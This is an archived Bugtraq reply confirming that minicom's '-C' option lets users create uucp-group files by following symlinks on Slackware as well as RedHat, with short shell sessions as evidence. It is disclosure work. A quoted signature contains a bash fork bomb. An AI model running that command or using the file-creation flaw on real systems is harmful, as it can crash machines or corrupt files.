Bugtraq mailing list archives
Re: RH 6.1 / 6.2 minicom vulnerability
From: Ben Lull <blull () valleylocal com>
Date: Tue, 22 Aug 2000 12:47:51 -0700
Slackware 7.0 (minicom 1.82): plix@technolust:/home/plix> groups secure wheel xuser plix plix@technolust:/home/plix> minicom -C foo minicom: cannot open /dev/ttyS1: Permission denied plix@technolust:/home/plix> ls -al foo -rw-r--r-- 1 plix uucp 0 Aug 22 12:36 foo plix@technolust:/home/plix> Slackware 7.1 (minicom 1.82.1) plix@mos:/home/plix> groups users plix@mos:/home/plix> minicom -C foo minicom: cannot open /dev/ttyS1: Permission denied plix@mos:/home/plix> ls -al foo -rw-r--r-- 1 plix uucp 0 Aug 22 12:39 foo -- Yep Slackware too using minicom 1.82 and 1.82.1 Thanks, Ben Lull *** * Ben Lull * Valley Local Internet, Inc. * Systems Administrator *** Michal Zalewski wrote:
On RedHat 6.1 and RedHat 6.2 boxes (I haven't found other
distributions
vulnerable): @(#)Minicom V1.83.0 (compiled Mar 7 2000)(c) Miquel van Smoorenburg [lcamtuf@nimue lcamtuf]$ minicom -C foo minicom: there is no global configuration file /etc/minirc.dfl Ask your sysadm to create one (with minicom -s). [lcamtuf@nimue lcamtuf]$ ls -l foo -rw-rw-r-- 1 lcamtuf uucp 0 Aug 18 12:21 foo ^^ ^^^^ Any file can be created anywhere with uucp privledges - it will follow
symlinks. Not nice on systems running uucp services. _______________________________________________________ Michal Zalewski [lcamtuf () tpi pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----= -- Support your government, give Echelon / Carnivore something to
parse --
classfield top-secret government restricted data information project
CIA
KGB GRU DISA DoD defense systems military systems spy steal
terrorist
Allah Natasha Gregori destroy destruct attack democracy will send
Russia
bank system compromise international own rule the world ATSC RTEM
warmod
ATMD force power enforce sensitive directorate TSP NSTD ORD DD2-N
AMTAS
STRAP warrior-T presidental elections policital foreign embassy
takeover
--------------------------------------------------------------------------
Current thread:
- RH 6.1 / 6.2 minicom vulnerability Michal Zalewski (Aug 21)
- Re: RH 6.1 / 6.2 minicom vulnerability Fred Souza (Aug 22)
- Re: RH 6.1 / 6.2 minicom vulnerability Moritz Hardt (Aug 22)
- Re: RH 6.1 / 6.2 minicom vulnerability Roman Drahtmueller (Aug 23)
- Re: RH 6.1 / 6.2 minicom vulnerability denis (Aug 22)
- Re: RH 6.1 / 6.2 minicom vulnerability Andreas Hasenack (Aug 22)
- Re: RH 6.1 / 6.2 minicom vulnerability Kris Kennaway (Aug 23)
- Re: RH 6.1 / 6.2 minicom vulnerability Dpk (Aug 25)
- <Possible follow-ups>
- Re: RH 6.1 / 6.2 minicom vulnerability Ben Lull (Aug 22)
- Re: RH 6.1 / 6.2 minicom vulnerability Sylvain Robitaille (Aug 30)
- Re: RH 6.1 / 6.2 minicom vulnerability Ben Lull (Aug 31)
- Re: RH 6.1 / 6.2 minicom vulnerability Sylvain Robitaille (Aug 30)